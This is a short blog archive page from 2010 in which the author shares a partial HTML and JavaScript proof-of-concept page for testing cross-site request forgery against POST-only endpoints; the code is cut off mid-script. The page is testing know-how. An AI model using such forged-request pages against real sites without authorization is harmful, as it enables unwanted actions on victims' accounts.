Posts Tagged ‘xsrf’

XSRF POST Testing

Wednesday, February 3rd, 2010 by mopey

POC XSRFs that only allow POST is not as straightforward as the GET. I use something like the following for situations like that.

<html>
<head></head>
<body>
<script>
function poststuff() {
var site = document.getElementById("posturl").value;
var post_data = document.getElementById("postparam").value;
alert("site: " + site);
alert("pdata: " + post_data);
var xmlhttp=new XMLHttpRequest();
xmlhttp.open("POST", site, true);
xmlhttp.onreadystatechange [...]

Tags:
Posted in GrayHat | No Comments »

No computers were harmed in the 0.312 seconds it took to produce this page.